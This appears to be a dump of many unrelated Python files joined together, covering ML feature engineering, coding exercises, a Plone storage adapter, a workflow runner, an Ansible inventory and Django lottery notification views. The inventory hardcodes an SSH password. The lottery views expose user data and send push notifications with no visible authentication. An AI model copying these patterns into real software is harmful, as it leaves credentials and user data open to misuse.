# df = df[c_vars.header_useful]
df.fillna(c_vars.fillna_dict, inplace = True)
# for col in df.columns.values:
# print (col)
# print (df[col].unique())
# print (df.dtypes)
# df['datetime'] = df['datetime'].apply(lambda x: datetime.strptime(x, "%Y-%m-%d %H:%M:%S"))
df['datetime'] = df['datetime'].apply(lambda x: datetime.strptime(x, "%Y-%m-%d %H:%M:%S"))
df['datetime_day'] = df['datetime'].apply(lambda x: x.day%7)
df['datetime_hour'] = df['datetime'].apply(lambda x: x.hour)
df['datetime_hour_map'] = df['datetime_hour'].apply(lambda x: c_vars.hour_mapping[x])
df = df.drop('datetime', axis=1)
for col in ['merchant', 'siteid', 'offerid', 'category']:
df[col] = df[col].astype(np.int64)
# df.loc[:, 'browserid'] = df['browserid'].apply(lambda x: x if x not in c_vars.browserid_map
# else c_vars.browserid_map[x])
# merchant, siteid, offerid, category
df_feature = {}
for col in ['merchant', 'siteid', 'offerid', 'category', 'countrycode', 'browserid', 'devid', 'datetime_hour', 'datetime_day']:
# for col in ['merchant']:
df_temp = df[[col, 'click']]
df_temp = df_temp.groupby([col]).agg(['count', np.sum])
df_temp.reset_index(inplace = True)
df_temp['count'] = df_temp['click', 'count']
df_temp['num_1'] = df_temp['click', 'sum']
df_temp['num_0'] = df_temp['count'] - df_temp['num_1']
df_temp = df_temp[[col, 'count', 'num_0', 'num_1']]
df_temp.columns = df_temp.columns.get_level_values(0)
df_temp.sort_values('count', inplace = True, axis = 0, ascending = False)
df_temp['cumul_sum'] = np.cumsum(df_temp['count'])
if col in ['merchant', 'siteid', 'offerid', 'category']:
df_temp_2 = df_temp.loc[df_temp['cumul_sum'] > c_vars.threshold_dict[col] * len(df), :]
df_temp = df_temp.loc[~(df_temp['cumul_sum'] > c_vars.threshold_dict[col] * len(df)), :]
df_temp = df_temp.append({col:-99999,
'count':np.sum(df_temp_2['count']),
'num_0':np.sum(df_temp_2['num_0']),
'num_1':np.sum(df_temp_2['num_1'])},
ignore_index = True)
df_temp['click_rate'] = df_temp['num_1']/df_temp['count']
df_temp.drop(['cumul_sum'], inplace = True, axis = 1)
df_feature[col] = df_temp.loc[:,:]
df = pd.merge(df, df_temp, how = 'left', on = col, suffixes = ('', ''))
df.rename(columns = {'count':col+'_count', 'num_0':col+'_num_0',
'num_1':col+'_num_1', 'click_rate':col+'_click_rate'},
inplace = True)
if col in ['merchant', 'siteid', 'offerid', 'category']:
for field in ['count', 'num_0', 'num_1', 'click_rate']:
df[col + '_' + field].fillna(df_feature[col].loc[df_temp[col] == -99999, field].values[0], inplace = True)
# print (df.columns.values)
for col1, col2 in [['countrycode', x] for x in ['merchant', 'siteid', 'offerid', 'category', 'datetime_hour_map']] +\
[['siteid', x] for x in ['merchant', 'offerid', 'category']]:
col = col1 + '_' + col2
df_temp = df[[col1, col2, 'click']]
df_temp = df_temp.groupby([col1, col2]).agg(['count', np.sum])
df_temp.reset_index(inplace = True)
df_temp['count'] = df_temp['click', 'count']
df_temp['num_1'] = df_temp['click', 'sum']
df_temp['num_0'] = df_temp['count'] - df_temp['num_1']
df_temp = df_temp[[col1, col2, 'count', 'num_0', 'num_1']]
df_temp.columns = df_temp.columns.get_level_values(0)
df_temp.sort_values('count', inplace = True, axis = 0, ascending = False)
df_temp['cumul_sum'] = np.cumsum(df_temp['count'])
if col in c_vars.threshold_dict:
df_temp_2 = df_temp.loc[df_temp['cumul_sum'] > c_vars.threshold_dict[col] * len(df), :]
df_temp = df_temp.loc[~(df_temp['cumul_sum'] > c_vars.threshold_dict[col] * len(df)), :]
df_temp = df_temp.append({col1:-999999, col2:-999999,
'count':np.sum(df_temp_2['count']),
'num_0':np.sum(df_temp_2['num_0']),
'num_1':np.sum(df_temp_2['num_1'])},
ignore_index = True)
df_temp['click_rate'] = df_temp['num_1']/df_temp['count']
df_temp.drop(['cumul_sum'], inplace = True, axis = 1)
df_feature[col] = df_temp.loc[:,:]
df = pd.merge(df, df_temp, how = 'left', on = [col1, col2], suffixes = ('', ''))
df.rename(columns = {'count':col+'_count', 'num_0':col+'_num_0',
'num_1':col+'_num_1', 'click_rate':col+'_click_rate'},
inplace = True)
if col in c_vars.threshold_dict:
for field in ['count', 'num_0', 'num_1', 'click_rate']:
df[col + '_' + field].fillna(df_feature[col].loc[(df_temp[col1] == -999999) & (df_temp[col2] == -999999),
field].values[0], inplace = True)
# print (df)
# print (df)
print (df.columns.values)
for col in df.columns.tolist():
print (col, np.sum(df[col].isnull()), df[col].dtype)
for col in ['datetime', 'click', 'merchant', 'siteid', 'offerid', 'category']:
# for col in ['datetime', 'click']:
c_vars.header_useful.remove(col)
c_vars.header_useful.append('datetime_day')
c_vars.header_useful.append('datetime_hour')
for col in ['merchant', 'siteid', 'offerid', 'category', 'countrycode', 'browserid', 'devid', 'datetime_hour', 'datetime_day'] +\
['countrycode_' + str(x) for x in ['merchant', 'siteid', 'offerid', 'category', 'datetime_hour_map']] +\
['siteid_' + str(x) for x in ['merchant', 'offerid', 'category']]:
for field in ['count', 'num_0', 'num_1', 'click_rate']:
c_vars.header_useful.append(col + '_' + field)
print (c_vars.header_useful)
with open('../analysis_graphs/df_feature', 'wb') as f:
pickle.dump(df_feature, f)
del df_feature
X = df[c_vars.header_useful].as_matrix()
y = df['click'].as_matrix()
print (str(datetime.now()) + ' Label Encoding Started')
# label_encoder = [LabelEncoder() for _ in range(3)]
label_encoder = [LabelEncoder() for _ in range(9)]
for i in range(len(label_encoder)):
label_encoder[i].fit(X[:,i])
# print (i, c_vars.header_useful[i], label_encoder[i].get_params(deep=True))
X[:,i] = label_encoder[i].transform(X[:,i])
print (str(datetime.now()) + ' Label Encoding Completed')
del df
X = X.astype(np.float64)
print (str(datetime.now()) + ' Standard Scaler Started')
standard_scaler = StandardScaler()
standard_scaler.fit(X)
# X_ohe = ohe.transform(X[:,[0,1,2,3,4]])
print (str(datetime.now()) + ' Standard Scaler Completed')
'''
print (str(datetime.now()) + ' OHE Started')
ohe = OneHotEncoder(sparse = False)
ohe.fit(X[:,[0,1,2,3,4]])
# X_ohe = ohe.transform(X[:,[0,1,2,3,4]])
print (str(datetime.now()) + ' OHE Completed')
'''
# X = X[:,[i for i in range(len(c_vars.header_useful)) if i not in [0,1,2,3,4,5]]]
# X = np.hstack((X, X_ohe))
# X = standard_scaler.transform(X)
# print (X)
# print (np.mean(X, axis = 0))
# print (np.var(X, axis = 0))
'''
'''
# save the label encoder and the one hot encoding to disk
with open('../analysis_graphs/label_encoder', 'wb') as f:
pickle.dump(label_encoder, f)
with open('../analysis_graphs/standard_scaler', 'wb') as f:
pickle.dump(standard_scaler, f)
# with open('../analysis_graphs/ohe', 'wb') as f:
# pickle.dump(ohe, f)
'''
print (X.shape, y.shape, np.sum(y))
sm = SMOTE(random_state=42)
X, y = sm.fit_sample(X, y)
print (X.shape, y.shape, np.sum(y))
chi2_values, p_values = chi2(X, y)
print ('chi square values')
print (chi2_values)
print ('p values')
print (p_values)
clf = RandomForestClassifier(n_estimators = 200, max_depth = 10, min_samples_leaf = 100,
random_state = 42, verbose = 2)
clf.fit(X, y)
print (clf.feature_importances_)
# feature_importances_
'''
|
def toh(s, d, e, n):
if n <= 0:
print("return from toh({}, {}, {}, {})".format(s, d, e, n))
return
#print("calling toh({}, {}, {}, {} -1)".format(s, e, d, n))
toh(s, e, d, n-1)
#print("after toh({}, {}, {}, {})".format(s, d, e, n))
print("move {} to {} disc {}".format(s, d, n))
#print("calling toh({}, {}, {}, {} -1)".format(e, d, s, n))
toh(e, d, s, n-1)
toh("s", "d", "e", 3) |
#!/usr/bin/env python
"""
_GetAvailableFilesByLimit_
Oracle implementation of Subscription.GetAvailableFilesByLimit
"""
from WMCore.WMBS.Oracle.Subscriptions.GetAvailableFiles import GetAvailableFiles as GetAvailableFilesOracle
class GetAvailableFilesByLimit(GetAvailableFilesOracle):
def execute(self, subscription, limit, conn = None, transaction = False):
self.sql = "SELECT * FROM (" + self.sql + ") WHERE rownum <= :maxLimit"
results = self.dbi.processData(self.sql, {"subscription": subscription,
"maxLimit": limit},
conn = conn, transaction = transaction)
return self.formatDict(results)
|
Nom = input("Entrer votre nom :")
Prenom = input("Entrer votre prenom :")
Age = input("Entrer votre âge :")
if (Age < str(18)):
print("Désolé " + Prenom + " " + Nom + " mais vous n'avez pas l'âge requis pour "
+ "entrer sur ce site ^^")
else:
print("Bienvenue " + Prenom + " " + Nom)
|
# ----------------------------------------------------------------------------
# Copyright 2014 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
"""
Script for generating the PB file for Spearmint:
- Go through the hyper-yaml
- extract lines that specify a !hyperopt range
- format and dump an entry into the protobuf
"""
import os
import logging
logger = logging.getLogger(__name__)
def write_pb(input_file, pb_file):
# go thorugh the hyperyaml line by line, read out values and write to pb
scipt_name = 'neon.hyperopt.gen_yaml_and_run' # script spearmint calls
has_hyperopt = False # hyperyaml specifies supported experiment
with open(input_file, 'r') as fin:
with open(pb_file, 'w') as fout:
fout.write('language: PYTHON \nname: "' + scipt_name + '"\n\n')
for inline in fin:
if '!hyperopt' in inline:
ho_dict = parse_line(inline)
outline = write_block(ho_dict)
fout.write(outline)
has_hyperopt = True
return has_hyperopt
def parse_line(line):
# generate a dictionary ho_dict with fields: [name, type, start, end]
dic = [k.strip("{},") for k in line.split()]
i = 0
while dic[i] != '!hyperopt':
i += 1
ho_dict = dict()
ho_dict['name'] = dic[i + 1]
ho_dict['type'] = dic[i + 2]
if (ho_dict['type'] == 'FLOAT'):
ho_dict['start'] = float(dic[i + 3])
ho_dict['end'] = float(dic[i + 4])
elif (ho_dict['type'] == 'INT'):
ho_dict['start'] = int(dic[i + 3])
ho_dict['end'] = int(dic[i + 4])
elif (ho_dict['type'] == 'ENUM'):
ho_dict['string'] = dic[i + 3]
else:
raise AttributeError("Supported types are FLOAT, INT, ENUM")
# todo: Spearmint supports ENUM but we are not handling it yet.
return ho_dict
def write_block(ho_dict):
# generate a block for the protobuf file from the hyperopt parameters
if ho_dict['type'] in ('FLOAT', 'INT'):
outline = """variable {
name: \""""+ho_dict['name']+"""\"
type: """+ho_dict['type']+"""
size: 1
min: """+str(ho_dict['start'])+"""
max: """+str(ho_dict['end'])+"""
}\n\n"""
return outline
elif ho_dict['type'] == 'ENUM':
raise NotImplementedError("ENUM parameters currently not supported")
else:
raise AttributeError("hyperparameter type not understood")
def main(hyperopt_dir):
# point of code entry
in_file = os.path.join(hyperopt_dir, 'hyperyaml.yaml')
pb_file = os.path.join(hyperopt_dir, 'spear_config.pb')
success = write_pb(in_file, pb_file)
if success:
print("Hyperparamter ranges written from %s to %s"
% (in_file, pb_file))
else:
raise AttributeError("No hyperopt ranges found in yaml.")
|
# Enter your code here. Read input from STDIN. Print output to STDOUT
import re
S = input()
# m = re.search("(\w(?!_))\\1+", S)
m = re.search(r"([a-zA-Z0-9])\1+", S)
print(m.group(1) if m else "-1")
|
def solution(index):
if index < 0:
return -1
digits = 1
while True:
if digits == 1:
numbers = 10
else:
numbers = 9*pow(10, (digits-1))
if index < digits * numbers:
return digit_at_index2(index, digits)
index -= numbers*digits
digits += 1
def digit_at_index(index, digits):
n = index//digits
digit = index%digits
num = n+begin_number(digits)
return str(num)[digit]
def digit_at_index2(index, digits):
n = digits - index%digits
num = index//digits + begin_number(digits)
while n > 1:
num //= 10
n -= 1
return num%10
def begin_number(digits):
if digits==1:
return 0
return pow(10, digits-1)
print(solution(1001))
|
from zope.interface import implements, alsoProvides, Interface
from zope.component import getMultiAdapter, provideUtility, provideAdapter
from souper.interfaces import ICatalogFactory
from souper.soup import get_soup, Record, NodeAttributeIndexer
from repoze.catalog.indexes.field import CatalogFieldIndex
from repoze.catalog.indexes.text import CatalogTextIndex
from repoze.catalog.indexes.keyword import CatalogKeywordIndex
try:
from souper.plone.interfaces import ISoupRoot
from souper.plone.locator import StorageLocator
except ImportError:
from .interfaces import ISoupRoot
from .locator import StorageLocator
provideAdapter(StorageLocator, adapts=[Interface])
from rapido.core.interfaces import IStorage, IRapidoApplication
from .catalog import CatalogFactory
from .interfaces import IRecord
class SoupStorage(object):
implements(IStorage)
def __init__(self, context):
self.context = context
self.id = context.id
self.root = self.context.root
provideUtility(CatalogFactory(), ICatalogFactory, name=self.id)
self._soup = get_soup(self.id, self.root)
def initialize(self):
""" setup the storage
"""
alsoProvides(self.root, ISoupRoot)
locator = StorageLocator(self.root)
locator.storage(self.id)
self._soup = get_soup(self.id, self.root)
@property
def soup(self):
return self._soup
def create(self):
""" return a new record
"""
record = Record()
rid = self.soup.add(record)
return getMultiAdapter(
(self.soup.get(rid), IRapidoApplication(self.context)),
IRecord)
def get(self, uid=None):
""" return an existing record
"""
try:
record = self.soup.get(uid)
except KeyError:
return None
return getMultiAdapter(
(record, IRapidoApplication(self.context)),
IRecord)
def delete(self, record):
""" delete a record
"""
del self.soup[record.context]
def search(self, query, sort_index=None, limit=None, sort_type=None,
reverse=False, names=None, with_size=False):
""" search for records
"""
records = self.soup.lazy(query, sort_index=sort_index, limit=limit,
sort_type=sort_type, reverse=reverse, names=names,
with_size=with_size)
app = IRapidoApplication(self.context)
for record in records:
yield getMultiAdapter((record(), app), IRecord)
def records(self):
for key in self.soup.data.keys():
yield self.get(key)
def rebuild(self):
self.soup.rebuild()
def clear(self):
self.soup.clear()
def reindex(self, record=None):
if record:
self.soup.reindex(records=[record.context])
else:
self.soup.reindex()
@property
def indexes(self):
return self.soup.catalog.keys()
def create_index(self, fieldname, indextype):
catalog = self.soup.catalog
field_indexer = NodeAttributeIndexer(fieldname)
if indextype == 'field':
catalog[fieldname] = CatalogFieldIndex(field_indexer)
elif indextype == 'keyword':
catalog[fieldname] = CatalogKeywordIndex(field_indexer)
elif indextype == 'text':
catalog[fieldname] = CatalogTextIndex(field_indexer)
|
name = input("What is your name? ")
print('Hi',name,'welcome to class.')
print('Hello {}!'.format(name),'welcome.') |
from lib.workflow.workflow_parser import WorkflowParser
from lib.workflow.job_factory import JobFactory
from lib.workflow.job_scheduler import JobScheduler
import time
class WorkflowRunner:
"""
Runs the jobs specified in workflow file.
"""
def __init__(self, filesystem, job_submission):
"""
Creates new instance of WorkflowRunner.
:param filesystem: Service for performing operations of filesystem.
:param job_submission: Service for submitting jobs.
"""
self._parser = WorkflowParser()
self._job_factory = JobFactory(filesystem, job_submission)
self._job_scheduler = JobScheduler()
def run(self, file_path):
"""
Runs jobs from workflow file.
Jobs are scheduled according to PARENT/CHILD relationships from
workflow file. If job fails, it's re-run after 5 seconds.
If second attempt also fails, execution of the workflow stops.
:param file_path: Path to the workflow file.
:returns List of unfinished jobs.
"""
parsed_jobs, self._relations = self._parser.parse(file_path)
self._create_jobs(parsed_jobs)
self._schedule_jobs()
return self._run_jobs()
def _create_jobs(self, parsed_jobs):
self._jobs = []
for name, cmd, args in parsed_jobs:
if cmd is None or args is None:
continue
self._jobs.append(self._job_factory.create_job(name, cmd, args))
def _schedule_jobs(self):
self._scheduled_jobs = self._job_scheduler.schedule(self._jobs,
self._relations)
def _run_jobs(self):
while len(self._scheduled_jobs) > 0:
if not self._run_scheduled_job():
break
self._scheduled_jobs.pop(0)
return [job.name for job in self._scheduled_jobs]
def _run_scheduled_job(self):
"""
Run a job, in case of a failure retry after 5 seconds.
"""
job = self._scheduled_jobs[0]
if self._execute(job):
return True
else:
print "Retrying to run the job in 5 seconds..."
time.sleep(5)
return self._execute(job)
def _execute(self, job):
success = False
try:
print "Running job: %s" % job.name
job.execute_command()
success = True
except Exception, e:
print "Job %s failed (%s)." % (job.name, str(e))
return success
|
import pandas as pd
import numpy as np
ser = {
'index': [0, 1, 2, 3],
'data': [145, 142, 38, 13],
'name': 'songs'
}
def get(ser, idx):
value_idx = ser['index'].index(idx)
return ser['data'][value_idx]
print get(ser, 1)
print get(ser, 3)
songs = {
'index': ['Paul', 'John', 'George', 'Ringo'],
'data': [145, 142, 38, 13],
'name': 'counts'
}
print get(songs, 'John')
songs2 = pd.Series([145, 142, 38, 13],
name='counts');
print songs2
songs3 = pd.Series([145, 142, 38, 13],
name='counts',
index=['Paul', 'John', 'George', 'Ringo'])
print songs3
print songs3.index
class Foo:
pass
ringo = pd.Series(
['Richard', 'Starkey', 13, Foo()],
name='ringo')
print ringo
nan_ser = pd.Series([2, None],
index=['Ono', 'Clapton'])
print nan_ser
print nan_ser.count()
numpy_ser = np.array([145, 142, 38, 13])
print songs3[1]
print numpy_ser[1]
print songs3.mean()
print numpy_ser.mean()
mask = songs3 > songs3.median() # boolean array
|
import json, requests, uuid, time, subprocess
from datetime import datetime
from lxml import etree
urls = open('anadarko','r')
regexurl = 'company_tagger.xml'
target = 'http://localhost:9200/contentmine/fact/'
'''try:
toremove = requests.get(target + '_search?size=1000000&q=berlin.exact:"yes"').json()
print 'deleting ', toremove['hits']['total']
for r in toremove['hits']['hits']:
if 'id' in r['_source'] and r['_source']['id']:
requests.delete(target + str(r['_source']['id']))
except:
pass'''
counter = 0
ranonurls = 0
amisuccess = 0
hitscore = 0
failures = []
for url in urls:
counter += 1
url = url.strip().replace('\n','')
print counter, url
# call AMI on the url if it is an htm or xml
if url.endswith('.htm') or url.endswith('.xml'):
ranonurls += 1
# run AMI on the file
co = [
'ami-regex',
'-i',
url,
'-g',
regexurl
]
p = subprocess.Popen(co, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if err:
failures.append(url)
print err
else:
amisuccess += 1
# find and read the output file
outputfile = 'target/null.xml/results.xml'
ns = etree.FunctionNamespace("http://www.xml-cml.org/ami")
ns.prefix = "zf"
tree = etree.parse(outputfile)
hits = tree.xpath('//zf:hit')
for hit in hits:
hitscore += 1
doc = {
'retrieved_by': 'ami-regex-berlin',
'retrieved_date': datetime.now().strftime("%Y-%m-%d %H%M")
}
doc["pre"] = hit.get("pre")
doc["fact"] = hit.get("word")
doc["post"] = hit.get("post")
doc['id'] = uuid.uuid4().hex
doc['file'] = url
doc['berlin'] = 'yes'
doc['company'] = 'yes'
doc['keywords'] = requests.get('http://cottagelabs.com/parser?blurb="' + doc['pre'] + ' ' + doc['fact'] + ' ' + doc['post'] + '"').json()
requests.post(target + str(doc['id']), data=json.dumps(doc))
time.sleep(0.05)
print ranonurls, amisuccess
print hitscore
print len(failures) |
# Generated by Django 2.1.7 on 2019-03-12 14:56
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('budget', '0010_auto_20190311_1852'),
]
operations = [
migrations.AddField(
model_name='statement',
name='month',
field=models.PositiveSmallIntegerField(default=0, verbose_name='Month'),
),
migrations.AddField(
model_name='statement',
name='year',
field=models.PositiveSmallIntegerField(default=0, verbose_name='Year'),
),
]
|
import tkinter as tk
import unittest
import sys
import os
sys.path.append(os.path.dirname(os.path.realpath(__file__)) + '/../../src')
from board import Board
from pieces.pawn import Pawn
from pieces.bishop import Bishop
from pieces.king import King
from game_state import *
class BoardTest(unittest.TestCase):
def test_populate_grid(self):
board = Board(tk.Toplevel())
board.populate_grid()
self.assertNotEqual(board.squares, {})
def test_board_lock(self):
board = Board(tk.Toplevel())
b = Bishop('white', 'white_bishop_1')
board.handle_board_lock(b, 0, 0)
self.assertTrue(board.lock)
b.selected = True
board.lock = True
board.handle_board_lock(b, 0, 0)
self.assertFalse(board.lock)
def test_handle_piece_movimentation(self):
board = Board(tk.Toplevel())
k = board.squares[(0,4)]['piece']
k.selected = True
board.handle_piece_movimentation(k, 0, 3, (0,4))
self.assertEqual(GameState.blackcoord, (0, 3))
def test_clear_square(self):
board = Board(tk.Toplevel())
p = board.squares[(1,1)]['piece']
board.clear_square(p, p.get_possible_moves((1,1), board.squares))
self.assertEqual([], board.selsquare) |
# Question: https://www.hackerrank.com/challenges/coin-change/problem
n,m = map(int, raw_input().split())
coins = list(map(int, raw_input().split()))
sol = [[0 for x in range(n+1)] for y in range(m+1)]
for i in range(1,m+1):
for j in range(1,n+1):
sol[i][j]+=sol[i-1][j]
if j%coins[i-1]==0:
sol[i][j]+=1
k=1
while j-k*coins[i-1]>0:
sol[i][j]+=sol[i-1][j-k*coins[i-1]]
k+=1
print sol[m][n]
|
#!/usr/bin/python
import json, sys, getopt
conf = {'tomcat-servers': {
'ansible_ssh_host': '127.0.0.1',
'ansible_ssh_port': 22,
# 'ansible_ssh_private_key_file': '~/.vagrant.d/insecure_private_key',
'ansible_ssh_user': 'vagrant',
'ansible_ssh_pass': 'vagrant',
'ansible_sudo': True
}}
def main(args):
if len(args) == 1 and args[0] == '--list':
print json.dumps(conf)
sys.exit()
if __name__ == "__main__":
main(sys.argv[1:])
#vagrant ansible_ssh_host=127.0.0.1 ansible_ssh_port=2222 ansible_ssh_private_key_file=~/.vagrant.d/insecure_private_key ansible_ssh_user=vagrant ansible_sudo=true
|
from turtle import Turtle, done
class GeometryTurtle(Turtle):
# TODO: Implement me!!!
pass
def main():
my_turtle = GeometryTurtle()
my_turtle.make_square(50)
my_turtle.penup()
my_turtle.forward(70)
my_turtle.pendown()
for i in range(6):
my_turtle.right(60)
my_turtle.make_square(30)
my_turtle.penup()
my_turtle.forward(70)
my_turtle.pendown()
my_turtle.make_rectangle(50, 20)
my_turtle.penup()
my_turtle.forward(70)
my_turtle.pendown()
my_turtle.make_triangle(50)
my_turtle.penup()
my_turtle.forward(70)
my_turtle.pendown()
my_turtle.make_star(49)
# The call to the function `done` from the `turtle` module means that you
# Have to close the window manually
done()
if __name__ == '__main__':
main()
|
import random
from yoolotto.lottery.models import LotteryTicket, LotteryDraw,LotteryCountryDivision
from django.views.generic import View
from django.http.response import HttpResponse
from yoolotto.lottery.tasks import notify_draw_result_all
from yoolotto.lottery.enumerations import EnumerationManager
from yoolotto.user.models import YooLottoUser
'''
Examples:-
(find tickets of draw)
http://IP:PORT/lottery/manual_notification/find_tickets?of_draw=7808
(find user of ticket)
http://IP:PORT/lottery/manual_notification/find_user?of_ticket=12990
http://IP:PORT/lottery/manual_notification/last_user
(send notification for ticket id directly)
http://IP:PORT/lottery/manual_notification?for_ticket=33370
OR
(send notification for all tickets of draw )
http://IP:PORT/lottery/manual_notification?for_draw=7808
'''
#specially taken for sending to iphone, integer instead of remote_id
state_codes={
"TX":0,
"CA":2,
"AZ":3,
"AR":4,
"CO":5,
"CT":6,
"DE":7,
"DC":8,
"FL":9,
"GA":10,
"ID":11,
"IL":12,
"IN":13,
"IA":14,
"KS":15,
"KY":16,
"LA":17,
"ME":18,
"MD":19,
"MA":20,
"MI":21,
"MN":22,
"MO":23,
"MT":24,
"NE":25,
"NH":26,
"NJ":27,
"NM":28,
"NY":29,
"NC":30,
"ND":31,
"OH":32,
"OK":33,
"OR":34,
"PA":35,
"RI":36,
"SC":37,
"SD":38,
"TN":39,
"VT":40,
"VA":41,
"WA":42,
"WI":43,
"WV":44,
"WY":45
}
class ManualNotification(View):
def get(self,request):
notification_type=request.GET.get('type','result')
for_draw=int(request.GET.get('for_draw','0'))
for_ticket=int(request.GET.get('for_ticket','0'))
for_user=int(request.GET.get('for_user','0'))
result=""
if notification_type=='result':
if LotteryTicket.objects.filter(id=for_ticket).exists():
result=notify_draw_result_for_ticket(for_ticket)
elif LotteryDraw.objects.filter(id=for_draw).exists():
result=notify_draw_result_all(for_draw)
else:
try:
#if YooLottoUser.objects.filter(id=for_user).exists():
user = YooLottoUser.objects.get(id=for_user)
draw=LotteryDraw.objects.get(id=for_draw)
component_name = draw.component.name
draw_value = "{:,}".format(draw.jackpot)
game_type = EnumerationManager.game_reverse(draw.component.parent.pk)
result=notify_frenzy_for_user_without_ticket(component_name, draw_value, game_type, user.id,draw.id)
except Exception,e:
import traceback
result=str(traceback.format_exc())
return HttpResponse("TYPE (result / frenzy) = "+str(notification_type)+"<br>" \
"for_draw = "+str(for_draw if for_draw else "NOT FOUND")+"<br>" \
"for_ticket = "+str(for_ticket if for_ticket else "NOT FOUND")+"<br>" \
"for_user = "+str(for_user if for_user else "NOT FOUND")+"<br>" \
"----------------------------------<br>"+\
result+"<br><br>"\
)
def post(self,request):
return HttpResponse(" IDIOT ")
class FindTickets(View):
def get(self,request):
of_draw=request.GET.get('of_draw','')
total=0
tickets=None
last=None
if not of_draw:
return HttpResponse("!! of_draw not provided !!")
if LotteryDraw.objects.filter(id=of_draw).exists():
if LotteryTicket.objects.filter(draw__id=int(of_draw)).exists():
total=LotteryTicket.objects.filter(draw__id=int(of_draw)).count()
if LotteryTicket.objects.filter(draw__id=int(of_draw)).exists():
tickets=LotteryTicket.objects.filter(draw__id=int(of_draw)).values('pk')
last=LotteryTicket.objects.filter(draw__id=int(of_draw)).order_by('-id')[0].id
else:
return HttpResponse("!! INVALID DRAW ID !!")
result="Total = "+str(total)+"<br>" \
"Tickets Found ="+str(tickets)+"<br>" \
"Last ticket ="+str(last)
return HttpResponse(result)
def post(self,request):
return HttpResponse(" IDIOT ")
class FindUser(View):
def get(self,request):
of_ticket=request.GET.get('of_ticket','')
user_id=None
if not of_ticket:
return HttpResponse("!! of_ticket not provided !!")
if LotteryTicket.objects.filter(id=of_ticket).exists():
user_id=LotteryTicket.objects.get(id=of_ticket).user.id
else:
return HttpResponse("!! INVALID TICKET ID !!")
result=" User ID = "+str(user_id)+"<br>" \
" For Ticket ="+str(of_ticket)+"<br>" \
return HttpResponse(result)
def post(self,request):
return HttpResponse(" IDIOT ")
class FindLastUser(View):
def get(self,request):
#of_ticket=request.GET.get('of_ticket','')
HELP_TEXT=" >>> Ensure no one is hitting ,this time ! <<< "
total_user="NOT FOUND"
user_id="NOT FOUND"
try:
user_id=YooLottoUser.objects.order_by('-id')[0].id
total_user=YooLottoUser.objects.count()
except Exception as e:
HELP_TEXT=str(e)
result=" <br> "+str(HELP_TEXT)+" <br>" \
" Total Users = "+str(total_user)+"<br>" \
" Last User ID = "+str(user_id)+"<br>" \
return HttpResponse(result)
def post(self,request):
return HttpResponse(" IDIOT ")
def notify_draw_result_all(draw_id):
from yoolotto.lottery.models import LotteryTicket
result=''
for _id in set([x["pk"] for x in LotteryTicket.objects.filter(
draw_id=int(draw_id), submissions__checked=False).values("pk")]):
result=result+"\n\n"+notify_draw_result_for_ticket(_id)
return result
def notify_draw_result_for_ticket(ticket_id):
from yoolotto.lottery.models import LotteryTicket
from yoolotto.communication.apn import APNSender
from yoolotto.communication.gcm_sender import GCMSender
try:
ticket = LotteryTicket.objects.get(pk=int(ticket_id))
except:
return
if not ticket.user.preferences.jackpot_drawing:
return
log = ""
log += "\nTicket: " + str(ticket.pk)
text = "Results available for %s" % ticket.draw.component.name
log += "\n" + text
for device in ticket.user.devices.all():
if not device.device_token:
log += "\nSkipped Device, No Token"
continue
if device.is_ios():
apn = APNSender(device.device_token, text=text,
custom={"code": "draw", "drawId": ticket.draw.pk,"state":state_codes[ticket.division.remote_id]})
print apn.send()
log += "\nAPN Outbound: %s" % device.device_token
elif device.is_android():
gcm = GCMSender(to=[device.device_token], data={"text": text,
"code": "draw", "drawId": ticket.draw.pk,
"state":ticket.division.remote_id,
"ticket_id":ticket.id
})
print gcm.send()
log += "\nGCM Outbound: %s" % device.device_token
#ticket.notified = True
ticket.save()
return log
def notify_frenzy_for_user_without_ticket(component_name, draw_value, game_type,user_id,draw_id):
from yoolotto.communication.apn import APNSender
from yoolotto.communication.gcm_sender import GCMSender
state=LotteryDraw.objects.get(id=draw_id).division.remote_id
# reducing multiple frenzies notification for any user ,
# based on user old hits for states in history
# and also sending duplicate notification for state TX and game_type in 0/1 Megamillion/Powerball
old_states=[str(_state) for _state in set(YooLottoUser.objects.get(id=user_id).tickets.values_list('division__remote_id',flat=True))]
send_for_states=[]
log=""
if (not old_states and state=="TX"):
send_for_states.append("TX")
elif (state in old_states):
send_for_states.append(state)
else:
log += "\nDevice auto skipped ,assume unnecessary state: %s" % state
if old_states and state=="TX" and game_type in [0,1]: # 0/Megamillion(TX),1/Powerball(TX):
#send duplicate notification for state that user has already played
[send_for_states.append(i) for i in old_states if i!="CA"]
send_for_states=list(set(send_for_states))
for _index,right_state in enumerate(send_for_states):#loop for duplicate notification
if right_state!="TX" and len(send_for_states) > 1:
log += "\n Send duplicate notification for state: %s" % right_state
user = YooLottoUser.objects.get(pk=int(user_id))
log += "\nUser: " + str(user.pk)
state_name=LotteryCountryDivision.objects.get(remote_id=right_state).name.title()
text = "%s %s Jackpot is %s!" % (state_name,component_name, draw_value)
log += "\n" + text
for device in user.devices.all():
if not device.device_token:
log += "\nSkipped Device, No Token"
continue
if device.is_ios():
apn = APNSender(device.device_token, text=text,
custom={"code": "frenzy", "gameType": game_type,
"state":state_codes[right_state],
"drawId":draw_id
})
apn.send()
log += "\nAPN Outbound: %s" % device.device_token
elif device.is_android():
gcm = GCMSender(to=[device.device_token], data={"text": text,
"code": "frenzy", "gameType": game_type,
"state":right_state,
"draw_id":draw_id+_index
})
gcm.send()
log += "\nGCM Outbound: %s" % device.device_token
log += "\n ---------------------------- \n"
return log
# draw_id=-1
# print LotteryTicket.objects.filter(draw_id=int(draw_id)).count()
# print LotteryTicket.objects.filter(draw_id=int(draw_id)).last().id#values("pk")
#print notify_draw_result_for_ticket(33369)
#
# def notify_frenzy_for_user(component_name, draw_value, game_type,ticket,draw_id):
# from yoolotto.user.models import YooLottoUser
# from yoolotto.communication.apn import APNSender
# from yoolotto.communication.gcm_sender import GCMSender
#
# log = ""
# text = "%s Jackpot is %s!" % (component_name, draw_value)
# log += "\n" + text
#
